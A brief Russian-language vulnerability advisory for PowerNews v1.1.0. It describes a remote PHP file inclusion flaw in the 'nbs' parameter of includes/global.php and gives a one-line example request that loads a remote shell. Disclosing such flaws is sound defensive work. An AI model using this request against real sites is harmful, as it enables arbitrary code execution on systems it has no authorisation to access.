Программа: PowerNews v1.1.0

Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре "nbs" в
сценарии includes/global.php. Удаленный
пользователь может выполнить произвольный
PHP сценарий на целевой системе с
привилегиями Web сервера.

Пример:

http://[target]/includes/global.php?nbs=[shell]?



Оставить мнение